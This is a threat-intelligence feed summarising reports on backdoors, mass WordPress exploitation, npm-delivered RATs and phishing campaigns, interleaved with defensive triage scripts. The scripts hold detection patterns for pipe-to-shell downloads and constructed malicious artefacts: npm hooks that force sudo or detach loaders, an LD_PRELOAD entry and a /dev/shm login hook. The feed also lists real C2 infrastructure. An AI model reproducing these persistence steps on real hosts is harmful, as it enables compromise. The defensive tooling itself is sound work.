RST Cloud
@rst_cloud
Threat intelligence solutions for businesses of all sizes
Sydney, New South Wales. Joined January 2015
89 Following, 670 Followers, 12.6K posts

#threatreport #MediumCompleteness
Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker | 24-06-2026
Source: security.com/threat-intelli…
Key details below ↓
🧑💻Actors/Campaigns:
Dragonforce
💀Threats:
Mltbackdoor, Kongtuke, Modelorat, Qilin_ransomware, Blackbasta, Interlock, Rhysida, Akira_ransomware, 8base, Clickfix_technique, Filefix_technique, Crashfix, Winpython_tool, Lolbin_technique, Nexshield, Mintsloader, Kerberoasting_technique, Anydesk_tool, Splashtop_tool
🎯Victims: Insurance, Education, Information technology, Professional services
🏭Industry: Education
🤖LLM extracted TTPs:
T1007, T1018, T1027, T1036, T1053.005, T1059.001, T1059.005, T1059.006, T1059.007, T1069.002, ...
🧨IOCs:
- File: 12
- Hash: 9
💽Software: Node.js, Curl, WordPress, Windows File Explorer, Microsoft Teams, Chrome, GateKeeper, Active Directory
🔢Algorithms: rc4
🗂️Win API: GetModuleFileNameW, LoadLibraryW
📜Programming Languages: javascript, vbscript, python, powershell
#threatreport:
Backdoor.Mistic is a newly identified backdoor that has been active since April 2026, primarily utilized by the cybercrime group Woodgnat, also known as KongTuke. It has been linked with various ransomware operations, particularly Qilin, and is often deployed in conjunction with ModeloRAT, a Python-based remote access trojan (RAT). The modus operandi involves opportunistic targeting across various sectors, such as insurance, education, IT, and professional services, demonstrating a wide-ranging interest in high-value organizational access rather than focusing on specific industries.
The backdoor is installed through a technique known as sideloading, using a legitimate file, MpExtMs.exe, to initiate the loading of the malicious DLL named EndpointDlp.dll. This mechanism allows Mistic to evade detection by blending in with trusted software, which enhances its stealth. Once operational, the backdoor executes commands from a command and control (C2) server entirely in memory without writing files to disk, enhancing its persistence and reducing the likelihood of detection. Key capabilities of Mistic include file manipulation, command execution, and self-termination via a kill switch to maintain access covertly over time.
Woodgnat's operations are predominantly characterized by the provision of initial access rather than the final delivery of malicious payloads. The group specializes in creating durable remote access for resale to ransomware affiliates, and they utilize a variety of techniques to compromise systems. Their methods include the use of social engineering tactics to trick users into executing malicious PowerShell commands, which enable further exploitation.
Additionally, Woodgnat employs an array of tools such as WinPython for running the ModeloRAT, alongside Node.js, which is leveraged to execute JavaScript and chain commands. The group has also been observed using living-off-the-land techniques, leveraging built-in Windows tools like Net.exe for reconnaissance and Curl for data exfiltration. A critical aspect of their strategy involves maintaining operational resilience through multiple C2 paths and obfuscated communications, particularly for non-domain-joined victims, indicating a highly skilled approach to evading detection.
The emergence of Backdoor.Mistic marks a notable trend in the evolution of cyber threats, emphasizing the use of custom-developed malware in ransomware attacks. This escalation implies a growing sophistication within the cybercriminal landscape, shifting away from reliance on dual-use tools. Woodgnat is poised as a significant threat actor to monitor, particularly in how it may adapt and innovate in collaboration with ransomware affiliates, further complicating the threat environment.

#threatreport #HighCompleteness
Chinese actor compromises thousands of Wordpress sites | 23-06-2026
Source: ctrlaltintel.com/research/Wordp…
Key details below ↓
💀Threats:
Godzilla_webshell, Bestshell, Meterpreter_tool, Vshell, Snowlight
🎯Victims: Wordpress sites, Joomla sites, Prestashop sites, Metinfo sites, Craft cms sites, Magento sites, Nacos sites, Internet facing sites
🌐Geo: Chinese
🔓CVEs: CVE-2025-6389 [Vulners](vulners.com/cve/CVE-2025-6…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2026-1357 [Vulners](vulners.com/cve/CVE-2026-1…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2025-13486 [Vulners](vulners.com/cve/CVE-2025-1…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2026-6433 [Vulners](vulners.com/cve/CVE-2026-6…)
- CVSS V3.1: 7.3
- Vulners: Exploitation: Unknown
CVE-2025-5394 [Vulners](vulners.com/cve/CVE-2025-5…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2026-31843 [Vulners](vulners.com/cve/CVE-2026-3…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: Unknown
CVE-2026-1969 [Vulners](vulners.com/cve/CVE-2026-1…)
- CVSS V3.1: 5.3
- Vulners: Exploitation: True
CVE-2026-4882 [Vulners](vulners.com/cve/CVE-2026-4…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: Unknown
CVE-2026-0740 [Vulners](vulners.com/cve/CVE-2026-0…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2025-12057 [Vulners](vulners.com/cve/CVE-2025-1…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2026-3844 [Vulners](vulners.com/cve/CVE-2026-3…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2025-12352 [Vulners](vulners.com/cve/CVE-2025-1…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: Unknown
CVE-2025-23921 [Vulners](vulners.com/cve/CVE-2025-2…)
- CVSS V3.1: 9.0
- Vulners: Exploitation: Unknown
CVE-2025-32432 [Vulners](vulners.com/cve/CVE-2025-3…)
- CVSS V3.1: 10.0
- Vulners: Exploitation: True
Soft:
- craftcms craft_cms (<3.9.15, <4.14.15, <5.6.17)
CVE-2024-34102 [Vulners](vulners.com/cve/CVE-2024-3…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
Soft:
- adobe commerce (2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6)
- adobe commerce_webhooks (<1.5.0)
- adobe magento (2.4.4, 2.4.5, 2.4.6, 2.4.7)
CVE-2026-3300 [Vulners](vulners.com/cve/CVE-2026-3…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
CVE-2025-34085 [Vulners](vulners.com/cve/CVE-2025-3…)
- CVSS V3.1: Unknown
- Vulners: Exploitation: Unknown
CVE-2024-6648 [Vulners](vulners.com/cve/CVE-2024-6…)
- CVSS V3.1: 7.5
- Vulners: Exploitation: Unknown
Soft:
- apollotheme ap_pagebuilder (<4.0.0)
CVE-2026-29014 [Vulners](vulners.com/cve/CVE-2026-2…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
Soft:
- metinfo (7.9, 8.0.0, 8.1)
CVE-2024-8856 [Vulners](vulners.com/cve/CVE-2024-8…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
Soft:
- revmakx backup_and_staging_by_wp_time_capsule (<1.22.22)
CVE-2024-2961 [Vulners](vulners.com/cve/CVE-2024-2…)
- CVSS V3.1: 7.3
- Vulners: Exploitation: True
Soft:
- gnu glibc (<2.40)
- netapp active_iq_unified_manager (-)
- debian debian_linux (10.0)
CVE-2026-48907 [Vulners](vulners.com/cve/CVE-2026-4…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: True
Soft:
- widgetfactorylimited jce (<2.9.99.5)
CVE-2025-7852 [Vulners](vulners.com/cve/CVE-2025-7…)
- CVSS V3.1: 9.8
- Vulners: Exploitation: Unknown
CVE-2025-7443 [Vulners](vulners.com/cve/CVE-2025-7…)
- CVSS V3.1: 8.1
- Vulners: Exploitation: Unknown
CVE-2020-25213 [Vulners](vulners.com/cve/CVE-2020-2…)
- CVSS V3.1: 10.0
- Vulners: Exploitation: True
Soft:
- filemanagerpro file_manager (<6.9)
📚TTPs:
⚔️Tactics: 9
🛠️Technics: 16
🧨IOCs:
- File: 17
- Url: 2
- Domain: 1
- IP: 2
- Hash: 9
💽Software: Wordpress, Linux, ThemeREX, BerqWP, WavePlayer, Joomla, WordPress ThemeREX, WordPress WavePlayer, WordPress BerqWP, ThinkPHP, ...
🔢Algorithms: base64, zip, md5, xor
📜Programming Languages: perl, javascript, python, php
💻Platforms: x86, x64, arm
#threatreport:
A mass web-exploitation operation, attributed to a Chinese actor, compromised thousands of WordPress sites in June 2026, as revealed by data exposed on the Hunt.io platform. This operation involved meticulous target acquisition, with over 850,000 recorded attempts against more than 442,000 vulnerability-site pairs, ultimately identifying 25,195 unique sites that exhibited confirmed or validated evidence of compromise.
The attack primarily focused on web applications, notably WordPress plugins, leveraging identified Common Vulnerabilities and Exposures (CVEs) to gain initial access. Key vulnerabilities exploited included arbitrary file uploads and remote code execution capabilities in widely used plugins such as Breeze Cache, ThemeREX Addons, and Gravity Forms, among others, along with various content management systems like Joomla and PrestaShop. Notable CVEs included CVE-2026-48907 (Joomla JCE), CVE-2026-31843 (Pay-UZ), and CVE-2025-7852 (WPBookit), which facilitated the unauthorized exploitation of these platforms.
The threat actor implemented sophisticated techniques for initial compromise, utilizing design patterns in their exploits that involved uploading malicious PHP files disguised as legitimate content (e.g., images), executing remote commands through file-handler functions, and deploying custom exploitation tools to automate the process. A variety of post-exploitation techniques were employed, including the installation of web shells and fetching attacker-controlled files. The primary web shell identified, named "down.php," demonstrated advanced capabilities for complete system control, arbitrary command execution, and extensive file management functions.
Tooling leveraged by the actor included custom scripts to adjust parameters in various exploit development frameworks and exploitation routines to maximize the efficiency of their scanning processes. This involved modifications to enhance threading parameters and to refine the search patterns for detecting vulnerabilities. The actors also maintained comprehensive logs of their activities, providing insights into their operational tempo and methodologies.
Attribution of the campaign rests on linguistic analysis of contained scripts, which exhibited fluent Simplified Chinese, indicating the involvement of a Chinese-speaking actor. The operational methods and toolsets suggest affiliations with groups known to deploy similar tactics. The use of FOFA for reconnaissance and the implementation of the Godzilla webshell for persistent access underscore the sophisticated nature of this attack.
In summary, this cyber operation showcases the exploitation of widely-known vulnerabilities across multiple web platforms, with a clear emphasis on WordPress plugins and prominent content management systems, revealing persistent threats to web security and the need for vigilance against similar mass exploitation attempts.
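A defender-side triage script for the upload pattern this post describes (PHP source behind an image extension, a webshell such as down.php dropped into a CMS upload tree). This is an added example, not code from the report or from ctrlaltintel; the magic-number table, extension sets and sample files are constructed for illustration, and the wp-content/uploads default path is an assumption.

```python
"""Scan a CMS uploads directory for files that should be static media but are not:
PHP source behind an image extension, a PHP extension hiding in a double extension,
and web server config files that change how the directory is served.
Added example; sample files are constructed, the uploads path is an assumption."""
import os
import sys
from pathlib import Path

# Expected leading bytes for the image types an upload handler normally accepts.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".webp": (b"RIFF",),
}
PHP_EXT = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7", ".phps"}
PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')
CONFIG_FILES = {".htaccess", ".user.ini"}
MAX_READ = 4 * 1024 * 1024  # enough to catch a PHP tag appended to a real image


def classify(name: str, data: bytes) -> list:
    """Reasons a file in an uploads tree deserves a look; [] means it looks like plain media."""
    reasons = []
    suffixes = [s.lower() for s in Path(name).suffixes]
    ext = suffixes[-1] if suffixes else ""
    if Path(name).name.lower() in CONFIG_FILES:
        reasons.append("web server config in uploads")
    if any(s in PHP_EXT for s in suffixes):
        reasons.append("PHP extension in filename")
    if ext in MAGIC:
        if not data.startswith(MAGIC[ext]):
            reasons.append("extension/magic mismatch")
        if any(m in data for m in PHP_MARKERS):
            reasons.append("PHP tag inside image")
    return reasons


def scan_dir(root: str) -> dict:
    """Walk `root` and map relative path -> reasons for every file classify() flags."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(MAX_READ)
            except OSError:
                continue
            reasons = classify(fn, data)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


# Constructed sample set (not the report's files): what a compromised uploads tree might hold.
SAMPLE_FILES = {
    "2026/06/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16,
    "2026/06/avatar.png": b"<?php /* constructed marker */ ?>",
    "2026/06/logo.gif": b"GIF89a" + b"\x00" * 8 + b"<?php /* constructed marker */ ?>",
    "2026/06/cat.php.jpg": b"\xff\xd8\xff\xe0",
    "down.php": b"<?php /* constructed marker */ ?>",
    ".htaccess": b"# constructed\nOptions -Indexes\n",
}


def scan_samples() -> dict:
    """Run classify() over SAMPLE_FILES; same output shape as scan_dir()."""
    return {name: r for name, data in SAMPLE_FILES.items() if (r := classify(Path(name).name, data))}


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content/uploads"  # assumption: WordPress layout
    results = scan_dir(root) if os.path.isdir(root) else scan_samples()
    for path, reasons in results.items():
        print(f"{path}: {', '.join(reasons)}")
```

A clean JPEG produces no finding; a genuine image with a PHP tag appended is still reported, which is the polyglot case a pure magic-number check would miss.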

#threatreport #MediumCompleteness
The Growing Threat of ShadowPad Malware and Its Business Impact | 24-06-2026
Source: cyberint.com/blog/dark-web/…
Key details below ↓
🧑💻Actors/Campaigns:
Winnti
💀Threats:
Shadowpad, Plugx_rat, Supply_chain_technique, Shadowhammer, Spear-phishing_technique, Lolbin_technique, Watering_hole_technique, Dll_sideloading_technique, Passthehash_technique, Process_injection_technique
🎯Victims: Government institutions, Critical infrastructure, High value corporate assets, Enterprise software
🏭Industry: Critical_infrastructure, Government
🌐Geo: Chinese
📚TTPs:
⚔️Tactics: 8
🛠️Technics: 20
🧨IOCs:
- IP: 34
- Hash: 6
💽Software: NetSarang
🔢Algorithms: sha256
📜Programming Languages: powershell
#threatreport:
ShadowPad malware, initially attributed to the Chinese state-sponsored group APT41, has become a notable threat in the cybersecurity landscape due to its modular and customizable architecture. First identified in 2015 as an evolution of PlugX, ShadowPad is now utilized by various APT groups, reflecting its versatility in executing malicious operations like data exfiltration, lateral movement, and establishing backdoors into infected systems. Its modularity allows the malware to adapt to specific targets, highlighting its capability for stealth and persistence.
The delivery mechanisms for ShadowPad are complex and varied, often employing sophisticated strategies designed to exploit specific vulnerabilities. It can be distributed through software supply chain attacks, wherein attackers compromise updates of legitimate applications, thus exploiting the trust users place in vendors. Additionally, the malware is utilized in conjunction with unpatched vulnerabilities within enterprise software, including zero-day exploits, which provide attackers with a gateway to infiltrate networks. Spear-phishing campaigns further facilitate the spread of ShadowPad, using well-crafted emails containing malicious links or attachments that execute the malware upon interaction. Moreover, operators utilize Living-off-the-Land (LotL) techniques by leveraging existing administrative tools and scripts, such as PowerShell and Windows Management Instrumentation (WMI), which helps avoid detection by security systems. Watering hole attacks also serve as a vehicle for distribution, targeting websites frequented by desired victims to serve the malware inadvertently.
The ramifications of deploying ShadowPad can be severe for organizations, leading to significant data breaches characterized by the exfiltration of sensitive information, operational disruptions, espionage activities, and substantial financial losses. The malware’s capabilities lend themselves to stealing intellectual property and customer data, which may be used for espionage or sold on illicit markets. Furthermore, the operational impact can lead to downtime and loss of productivity, as well as the installation of additional payloads that disrupt critical systems. Organizations face the prospect of costly incident response, system recovery efforts, and potential regulatory fines for data breaches that can also incur reputational damage. The public exposure of such incidents may diminish customer trust and market value, resulting in long-term consequences for affected entities.

#threatreport #MediumCompleteness
MYRA: A Full Linux RAT Distributed via npm | 23-06-2026
Source: safedep.io/malicious-apin…
Key details below ↓
💀Threats:
Myra, Supply_chain_technique, Process_injection_technique, Nop_sled_technique
🎯Victims: Software development, Linux systems, Npm users
🌐Geo: Polish
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1014, T1036.005, T1053.003, T1055.008, T1059.004, T1095, T1113, T1195.001, T1548.003, T1564.001, ...
🧨IOCs:
- IP: 2
- Email: 1
- File: 12
💽Software: Linux, Node.js, systemd, curl, Ubuntu, sudo
🔢Algorithms: sha256, base64
🔠Functions: readFileSync, createHmac, persistStealthPreload, writeFileSync, persistStealthCron, persistStealthProfile, findDesktopProcessEnv, readProcEnviron
📜Programming Languages: javascript, python
#threatreport:
A full-featured Linux remote access Trojan (RAT) named MYRA has been distributed via an npm package titled "apintergrationpost." Despite the author's claimed purpose of facilitating authorized red team exercises and EDR validation, MYRA exhibits significant malicious capabilities. Upon installation, it compiles a native C rootkit, establishes three persistence mechanisms, masquerades as a legitimate system service, and manifests fileless execution. The RAT also grants interactive shell access and stream captures from the infected system. The default command and control (C2) configuration points to a private IP address (192.168.54.1), indicating a focused targeting strategy.
The installation process is initiated through three npm lifecycle scripts. The 'prepare' script compiles the rootkit by generating C binaries and shared libraries essential for the RAT's evasion tactics and persistence. The 'preinstall' script forces root privileges, ensuring that the attacker has full access to system-level resources and can install necessary system dependencies. Upon successful installation, the 'postinstall' script launches the RAT in a detached background process, rendering it independently operational from npm.
The MYRA RAT employs a plugin architecture with 13 modules for its C2 framework, utilizing TCP for communication and requiring HMAC-SHA256 authentication. Notably, the use of a private IP for the C2 server suggests its deployment in a defined network environment rather than using common public domains seen in typical malware distributions. The native rootkit contains sophisticated components such as 'libcache.so' for file hiding via LD_PRELOAD, 'proc_hide' for process masquerading, and 'memfd_exec' and 'memfd_loader' for executing the RAT entirely from memory, thus leaving no traces on disk.
Persistence is achieved through three distinct mechanisms: the LD_PRELOAD file-hiding rootkit, a cron job that triggers every 13 minutes to run the RAT, and a login hook via profile.d that executes a wrapper script utilizing the most covert execution method available. These vectors collectively ensure that the RAT remains active even after system reboots or user intervention attempts.
As the RAT was developed within a VMware environment, the codebase of MYRA includes telemetry and various MITRE ATT&CK techniques, pointing towards a scenario for red team testing rather than actual deployment into the wild. However, the publication of MYRA into a public npm registry poses grave risks, as it allows unauthorized users access to a potent toolkit that aggregates well-known evasion techniques. The combination of these sophisticated tactics within a single package presents an alarming threat landscape for defenders, reinforcing the need for cautious evaluation of npm packages before installation.
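A read-only host triage for the three persistence mechanisms the post lists (an /etc/ld.so.preload entry, a cron job on a fixed 13-minute cadence, a login hook in /etc/profile.d that launches a detached process). Added example, not code from SafeDep or from the package; the library path, cron lines and profile.d contents below are constructed, and the trusted-directory and staging-path lists are heuristics of my own.

```python
"""Triage of the three Linux persistence mechanisms described for MYRA: an entry in
/etc/ld.so.preload (LD_PRELOAD rootkit), a cron job on a fixed N-minute cadence, and a
login hook in /etc/profile.d that launches a detached process.
Added example; the file contents, library name and paths below are constructed."""
import glob
import os
import re

# A non-empty /etc/ld.so.preload is rare enough to be worth a look on its own; an entry
# outside the distro's library directories (deliberately excluding /usr/local) is the finding.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
# Writable staging locations and in-memory execution hints used by fileless loaders.
STAGING_HINTS = ("/tmp/", "/dev/shm/", "/var/tmp/", "memfd")
DETACHERS = {"nohup", "setsid", "disown"}


def preload_findings(ld_so_preload_text: str) -> list:
    """Entries of /etc/ld.so.preload that point outside TRUSTED_LIB_DIRS."""
    findings = []
    for raw in ld_so_preload_text.splitlines():
        lib = raw.split("#", 1)[0].strip()
        if lib and not lib.startswith(TRUSTED_LIB_DIRS):
            findings.append(lib)
    return findings


def cron_cadence_findings(crontab_text: str, minutes: int) -> list:
    """Commands scheduled as '*/N * * * *' (every N minutes); system and user crontab formats."""
    pat = re.compile(r"^\*/%d\s+\*\s+\*\s+\*\s+\*\s+(.+)$" % minutes)
    out = []
    for line in crontab_text.splitlines():
        m = pat.match(line.strip())
        if m:
            out.append(m.group(1))
    return out


def profile_hook_findings(scripts: dict) -> dict:
    """{filename: [reasons]} for /etc/profile.d scripts that detach a process or reference
    a staging path; `scripts` maps filename -> content. Comments are ignored."""
    out = {}
    for name, body in scripts.items():
        reasons = []
        for line in body.splitlines():
            code = line.split("#", 1)[0]
            if any(h in code for h in STAGING_HINTS):
                reasons.append("staging path: " + line.strip())
            if DETACHERS & set(code.split()) or code.rstrip().endswith("&"):
                reasons.append("detached launch: " + line.strip())
        if reasons:
            out[name] = reasons
    return out


def triage_host(minutes: int = 13) -> dict:
    """Run the three checks against the live host; unreadable files are skipped."""
    def read(path):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                return fh.read()
        except OSError:
            return ""
    cron_sources = (["/etc/crontab"] + glob.glob("/etc/cron.d/*")
                    + glob.glob("/var/spool/cron/crontabs/*") + glob.glob("/var/spool/cron/*"))
    hooks = {os.path.basename(p): read(p) for p in glob.glob("/etc/profile.d/*")}
    return {
        "ld.so.preload": preload_findings(read("/etc/ld.so.preload")),
        "cron": [c for src in cron_sources for c in cron_cadence_findings(read(src), minutes)],
        "profile.d": profile_hook_findings(hooks),
    }


# Constructed samples (not the report's IOCs): what the three artefacts could look like.
SAMPLE_PRELOAD = "/usr/local/share/.cache/libcache.so\n"
SAMPLE_CRONTAB = (
    "*/13 * * * * /usr/local/share/.cache/run.sh >/dev/null 2>&1\n"
    "0 3 * * * root /usr/bin/apt-get update\n"
)
SAMPLE_PROFILE_D = {
    "00-locale.sh": "export LANG=C.UTF-8\n",
    "zz-cache.sh": "# cache warmup\nnohup /dev/shm/.c/wrapper.sh >/dev/null 2>&1 &\n",
}

if __name__ == "__main__":
    for check, result in triage_host().items():
        print(check, result)
```

The cadence check only matches the `*/N` spelling; a job written as an explicit minute list (`0,13,26,...`) needs a second pattern.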

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, code: 6

#threatreport #HighCompleteness
An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026
Source: cyfirma.com/research/an-in…
Key details below ↓
💀Threats:
Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique
🎯Victims: Users in india, Organizations in india
🏭Industry: Government
🌐Geo: Indian, Hong kong, China, India
📚TTPs:
⚔️Tactics: 8
🛠️Technics: 22
🧨IOCs:
- Domain: 1
- File: 2
- IP: 3
- Hash: 8
🔢Algorithms: zip, sha256, md5
🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime
🗂️Win API: DllEntry, GetSecurityInfo
YARA: Found
#threatreport:
A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip.
Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging.
The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication.
The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries.
While the C2 infrastructure points to geolocation in Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the enticingly regional indicators, comprehensive attribution remains undetermined.
Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.

#threatreport #MediumCompleteness
From PostCSS Masquerading to Windows RAT | 23-06-2026
Source: research.jfrog.com/post/from-post…
Key details below ↓
🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem
📚TTPs:
⚔️Tactics: 3
🛠️Technics: 0
🤖LLM extracted TTPs:
T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ...
🧨IOCs:
- File: 18
- Command: 1
- Domain: 1
- Url: 2
- IP: 1
- Hash: 6
💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray
🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305
🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege
📜Programming Languages: javascript, powershell, python
#threatreport:
The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. Such obfuscation relies on the popularity of the postcss-selector-parser package, which reports over 150 million weekly downloads to social engineer unsuspecting users.
The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. These packages, upon decoding, lead to a PowerShell downloader that initiates the payload chain. The end result is a downloader that fetches additional malicious components from a command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, thereby further deploying the malware.
Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment.
The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins.
Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup.
In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.
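A package-manifest audit for the two npm supply-chain signals in this post and in the MYRA post above: lifecycle scripts (prepare/preinstall/postinstall) that build native code, demand root or detach a background process, and package names that imitate a popular package the way postcss-minify-selector-parser imitates postcss-selector-parser. Added example, not code from JFrog or SafeDep; the POPULAR list is a constructed stand-in for a download-ranked package list, and the manifest is constructed.

```python
"""Audit an npm package manifest for risky lifecycle scripts and lookalike package names.
Added example; POPULAR and SAMPLE_MANIFEST are constructed stand-ins, not real packages."""
import json
import re
import sys
from difflib import SequenceMatcher

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish", "preprepare", "postprepare"}
# Patterns in a lifecycle script worth a human look before `npm install` runs them.
RISKY_TOKENS = {
    "native build": re.compile(r"\b(gcc|cc|clang|make|node-gyp)\b"),
    "privilege demand": re.compile(r"\bsudo\b|\bEUID\b|\bid\s+-u\b"),
    "detached process": re.compile(r"\b(nohup|setsid|disown)\b|&\s*$"),
    "fetch and execute": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node|python3?)\b"),
    "encoded payload": re.compile(r"base64\s+(-d|--decode)|from\([^)]*['\"]base64['\"]\)"),
}
# Constructed stand-in for a list of high-download package names (assumption).
POPULAR = ["postcss", "postcss-selector-parser", "lodash", "express", "axios", "chalk"]


def risky_lifecycle_scripts(manifest: dict) -> dict:
    """{hook: [labels]} for lifecycle scripts matching any RISKY_TOKENS pattern."""
    out = {}
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            hits = [label for label, rx in RISKY_TOKENS.items() if rx.search(cmd)]
            if hits:
                out[hook] = hits
    return out


def lookalike_names(manifest: dict, popular=POPULAR, threshold: float = 0.8) -> list:
    """(name, popular_name, ratio) for the package's own name and each dependency that
    resembles a popular package without being it. An exact match is the real package."""
    candidates = [manifest.get("name", "")]
    for field in ("dependencies", "devDependencies", "optionalDependencies"):
        candidates.extend(manifest.get(field, {}))
    findings = []
    for cand in candidates:
        for known in popular:
            if cand and cand != known:
                ratio = SequenceMatcher(None, cand, known).ratio()
                if ratio >= threshold:
                    findings.append((cand, known, round(ratio, 2)))
    return findings


# Constructed manifest combining the MYRA hook pattern (compile in prepare, force root in
# preinstall, detach in postinstall) with a dependency named after a popular package.
SAMPLE_MANIFEST = {
    "name": "example-pkg",
    "scripts": {
        "prepare": "gcc -shared -fPIC -o native/libcache.so native/hide.c",
        "preinstall": '[ "$(id -u)" = 0 ] || exec sudo npm install',
        "postinstall": "nohup node loader.js >/dev/null 2>&1 &",
        "test": "node test.js",
    },
    "dependencies": {
        "postcss-minify-selector-parser": "^1.0.0",
        "aes-decode-runner-pro": "^2.1.0",
        "lodash": "^4.17.21",
    },
}


def audit(manifest: dict) -> dict:
    return {"scripts": risky_lifecycle_scripts(manifest), "lookalikes": lookalike_names(manifest)}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            manifest = json.load(fh)
    else:
        manifest = SAMPLE_MANIFEST
    print(json.dumps(audit(manifest), indent=2))
```

Run it against `package.json` of a package before installing, or with `npm install --ignore-scripts` as the baseline so that a flagged hook never runs unreviewed.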

#threatreport #LowCompleteness
Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026
Source: zimperium.com/blog/extended-…
Key details below ↓
💀Threats:
Eviltokens_tool, Device_code_phishing_technique
🎯Victims: Microsoft 365 users, Mobile users
🤖LLM extracted TTPs:
T1528, T1550.001, T1566.002, T1583.006
🔢Algorithms: aes-gcm
#threatreport:
